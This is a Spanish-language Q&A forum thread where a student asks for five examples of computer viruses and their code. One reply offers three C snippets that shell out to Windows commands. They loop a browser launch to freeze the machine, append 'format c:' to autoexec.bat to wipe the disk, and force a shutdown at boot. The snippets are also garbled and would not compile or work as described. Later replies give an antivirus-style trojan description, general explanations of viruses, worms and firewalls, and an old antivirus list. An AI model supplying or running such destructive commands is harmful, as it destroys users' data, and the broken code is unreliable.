Hola, soy estudiante y tengo un trabajo proximo y le pido que porfa me conteste. necesito 5 ejemplos de virus y su programación....!!!!!!!!!!!!!!1 grasias
Un virus troyano y su programacion seria:
ejemplo 1:
#include <stdio.h>/*aqui importas al escenario lo que vayas a utilizar el .h es un header file*/
void main(){
system(":hola");/*aqui dices que del sistema de los comandos de windows te haga una sección llamada hola*/
system("start https://www.google.com/?gws_rd=ssl");/*abre google*/
system("goto hola") ;/*va a la sección hola por lo tanto la repite infinitas veces*/
}
ese seria un win32 de c que sirve para que se trabe tu computadora o por ejemplo 2:
#include <stdio.h>
void main(){
system("@echo off");/*se quita lo que viene al principio de cada oración que usualmente es la direccion donde esta ubicada el archivo*/
system("cls");/*borra lo escrito*/
system("s | format c: -s -f -t 0 >> c:\autoexec.bat");/*borra el disco duro*/
}
esto hara que se borre la información o tambien
ejemplo 3:
#include <studio.h>
void main(){
system("@echo off");
system("cls");
system("echo shutdown -sf -t 0 >> c:\autoexec.bat");/*te apaga la compu a la fuerza*/
system("cls");
este es para que te apague la computadora estos signos /**/ significan comentarios no aparecen en la pantalla solo es una explicación
888ger888
Mensajes enviados185Fecha de inscripciónviernes, 19 de marzo de 2010EstatusMiembroÚltima intervenciónjueves, 28 de octubre de 2010362 23 mar 2010 a las 19:52
aki te dejo un ejemplo de el famoso troyan dropper k es el virus k mas me a costado eliminar.
Nombre: TrojanDropper.Agent.AKR
Tipo: Caballo de Troya
Alias: Agent.AKR, TrojanDropper.Agent.AKR, BackDoor-CFE, Dropper.Agent.akr, eTrust-InoculateIT, PSW.Banker.YAR, TR/Drop.Agent.akr, Troj/Dropper-FJ, Trojan.DR.Delf.BJP, Trojan.Dropper, Trojan.Dropper.Delf-9, Trojan.Dropper.Small.IDD, Trojan.MulDrop.3375, Trojan.Win32.Delf.NS, Trojan/Drop.Agent.akr, TrojanDropper.Win32.Agent, Trojan-Dropper.Win32.Agent.akr, W32/Banker.ATS!pws, Win32/TrojanDownloader.Small.CNK, Win32/TrojanDropper.Agent.AKR
Fecha: 16/mar/06
Plataforma: Windows 32-bit
Tamaño: 244,224 bytes
Troyano del tipo "TrojanDropper". Estos troyanos suelen ser utilizados para instalar otros malwares en el equipo infectado, sin el conocimiento de los usuarios. El código malicioso es liberado y luego ejecutado. En ocasiones, se liberan varios troyanos.
Esta variante creó popularidad al ser descargada por el Win32/TrojanDownloader.Small.CNK, el troyano enviado en un spam con el asunto "Slobodan Milosevic was killed".
Cuando se ejecuta, libera al menos otros tres troyanos, uno de ellos de la familia de los "Spy.Banker".
También intenta descargar y ejecutar otros archivos de Internet.
El troyano no se propaga por si mismo. Puede llegar a nuestro PC al ser copiado manualmente en el sistema, o al ser descargado intencionalmente o mediante engaños de algún sitio malicioso, o de redes de intercambio de archivos P2P.
Un usuario malintencionado, también podría enviar el troyano a su víctima en un mensaje electrónico individual o masivamente por medio de spam a otros usuarios.
Otros malwares (como Win32/TrojanDownloader.Small.CNK), también podrían descargarlo y ejecutarlo en un sistema infectado.
mira ve a internet, y ahi busca tipos de anti viruz esta el norton,avira,avg etc.son los que recuerdo ya de ahi vas buscando la informacion necesaria.la verda apenas ando aprendiendo esto,pero igual te sirva de algo.
fr3ski7o
Mensajes enviados513Fecha de inscripciónlunes, 29 de septiembre de 2008EstatusMiembroÚltima intervenciónmiércoles, 15 de agosto de 2012564 14 oct 2008 a las 18:20
¿ que es un virus informatico ?
1)
Un virus informático es un programa o software que se autoejecuta y se propaga insertando copias de sí mismo en otro programa o documento.
Un virus informático se adjunta a un programa o archivo de forma que pueda propagarse, infectando los ordenadores a medida que viaja de un ordenador a otro.
Como los virus humanos, los virus de ordenador pueden propagarse en gran medida: algunos virus solo causan efectos ligeramente molestos mientras que otros pueden dañar tu hardware, software o archivos.
Casi todos los virus se unen a un fichero ejecutable, lo que significa que el virus puede estar en tu ordenador pero no puede infectarlo a menos que ejecutes o abras el programa infectado. Es importante observar que un virus no puede continuar su propagación sin la acción humana, (por ejemplo ejecutando un programa infectado).
La gente contribuye a la propagación de los virus, muchas veces sin saberlo, al compartir archivos infectados o al enviar e-mails con virus como archivo adjunto en el email.
La inserción del virus en un programa se llama infección, y el código infectado del archivo (o ejecutable que no es parte de un archivo) se llama hospedador (host).
Los virus son uno de los varios tipos de Malware o software malévolo.
Algunos virus tienen una carga retrasada, que a veces se llama bomba. Por ejemplo, un virus puede exhibir un mensaje en un día o esperar un tiempo específico hasta que ha infectado cierto número de hospedadores. Sin embargo, el efecto más negativo de los virus es su autoreproducción incontrolada, que sobrecarga todos los recursos del ordenador.
Debido a Internet, hoy en día son más comunes los gusanos que los virus. Los programas antivirus, diseñados originalmente para proteger los ordenadores contra virus, se han ampliado para cubrir gusanos y otras amenazas tales como el spyware.
Preguntas relacionadas:
2) Diferencia entre un virus, un gusano y un troyano
A la hora de hablar de virus de ordenador la mayoría de la gente se refiere equivocadamente a los gusanos y a los caballos de Troya como si fueran virus.
Aunque los términos troyano, gusano y virus se utilizan a menudo alternativamente, no son iguales. Los virus, los gusanos y los caballos de Troya son todos programas malévolos que pueden causar daño a tu ordenador, pero hay diferencias entre los tres, y saber esas diferencias puede ayudarte a proteger mejor tu ordenador contra sus efectos, a menudo, muy perjudiciales
3) los virus mas potentes son...
Un troyano informático, caballo de Troya o Trojan Horse está tan lleno de artimañas como lo estaba el mitológico caballo de Troya del que se ha tomado el nombre.
A primera vista el troyano parece ser un programa útil, pero en realidad hará daño una vez instalado o ejecutado en tu ordenador. Los que reciben un troyano normalmente son engañados a abrirlos porque creen que han recibido un programa legítimo o archivos de procedencia segura.
Cuando se activa un troyano en tu ordenador, los resultados pueden variar. Algunos troyanos se diseñan para ser más molestos que malévolos (como cambiar tu escritorio agregando iconos de escritorio activos tontos), mientras que otros pueden causar daño serio, suprimiendo archivos y destruyendo información de tu sistema.
También se conoce a los troyanos por crear puertas traseras o backdoors en tu ordenador permitiendo el acceso de usuarios malévolo a tu sistema, accediendo a tu información confidencial o personal.
A diferencia de los virus y gusanos, los troyanos ni se auto replican ni se reproducen infectando otros archivos.
Un worm o gusano informático es similar a un virus por su diseño, y es considerado una subclase de virus. Los gusanos informáticos se propagan de ordenador a ordenador, pero a diferencia de un virus, tiene la capacidad a propagarse sin la ayuda de una persona. Un gusano informático se aprovecha de un archivo o de características de transporte de tu sistema, para viajar.
Lo más peligroso de los worms o gusanos informáticos es su capacidad para replicarse en tu sistema, por lo que tu ordenador podría enviar cientos o miles de copias de sí mismo, creando un efecto devastador enorme. Un ejemplo sería el envío de una copia de sí mismo a cada uno de los contactos de tu libreta de direcciones de tu programa de email. Entonces, el gusano se replica y se envía a cada uno de los contactos de la libreta de direcciones de cada uno de los receptores, y así continuamente.
Debido a la naturaleza de copiado de un gusano informático y de su capacidad de viajar a través de redes el resultado final, en la mayoría de los casos, es que el gusano consume demasiada memoria de sistema (o anchura de banda de la red), haciendo que los servidores y los ordenadores individuales dejen de responder.
En ataques de gusano recientes, como el del gusano Blaster Worm, el gusano está diseñado para hacer un túnel en tu sistema y permitir que usuarios malévolos controlen remotamente tu ordenador.
4) ¿ que es un cortafuegos o firewall ?
Un cortafuegos o firewall es un sistema que previene el uso y el acceso desautorizados a tu ordenador.
Los cortafuegos pueden ser software, hardware, o una combinación de ambos. Se utilizan con frecuencia para evitar que los usuarios desautorizados de Internet tengan acceso a las redes privadas conectadas con Internet, especialmente intranets.
Todos los mensajes que entran o salen de la Intranet pasan a través del cortafuegos, que examina cada mensaje y bloquea los que no cumplen los criterios de seguridad especificados.
Es importante recordar que un cortafuegos no elimina problemas de virus del ordenador, sino que cuando se utiliza conjuntamente con actualizaciones regulares del sistema operativo y un buen software antivirus, añadirá cierta seguridad y protección adicionales para tu ordenador o red.
Cortafuegos de hardware
Los cortafuegos de hardware proporcionan una fuerte protección contra la mayoría de las formas de ataque que vienen del mundo exterior y se pueden comprar como producto independiente o en routers de banda ancha.
Desafortunadamente, luchando contra virus, gusanos y Troyanos, un cortafuegos de hardware puede ser menos eficaz que un cortafuegos de software, pues podría no detectar gusanos en emails.
Cortafuegos de software
Para usuarios particulares, el cortafuegos más utilizado es un cortafuego de software. Un buen cortafuegos de software protegerá tu ordenador contra intentos de controlar o acceder a tu ordenador desde el exterior, y generalmente proporciona protección adicional contra los troyanos o gusanos de E-mail más comunes.
La desventaja de los cortafuegos de software es que protegen solamente al ordenador en el que están instalados y no protegen una red.
Hay varios tipos de técnicas cortafuegos
Packet filter: mira cada paquete que entra o sale de la red y lo acepta o rechaza basándose en reglas definidas por el usario. La filtración del paquete es bastante eficaz y transparente a los usuarios, pero es difícil de configurar. Además, es susceptible al IP spoofing.
Application gateway: Aplica mecanismos de seguridad a ciertas aplicaciones, tales como servidores ftp y servidores telnet. Esto es muy eficaz, pero puede producir una disminución de las prestaciones.
Circuit-level gateway: Aplica mecanismos de seguridad cuando se establece una conexión TCP o UDP. Una vez que se haya hecho la conexión, los paquetes pueden fluir entre los anfitriones sin más comprobaciones.
Proxy server: Intercepta todos los mensajes que entran y salen de la red. El servidor proxy oculta con eficacia las direcciones de red verdaderas.
En la práctica, muchos cortafuegos utilizan dos o más de estas técnicas a la vez.
Un cortafuegos se considera la primera línea de defensa en la protección de la información privada. Para mayor seguridad, los datos pueden ser cifrados.
5) ¿ cual es el mejor antivirus ?
Nod32 2.51.30 ( mejor calificado )
Vba32 3.11.0
VirIT 6.1.9
AVG 7.1.405 Professional
AVG 7.1.405 freeware
Rising AV 18.41.30
McAfee 10.0.27
Ikarus 5.19
F-Prot 6.0.4.3 beta
Ukrainian National Antivirus 1.83
espero q te alla servido tarde en copiarlo pero bue suerte ;)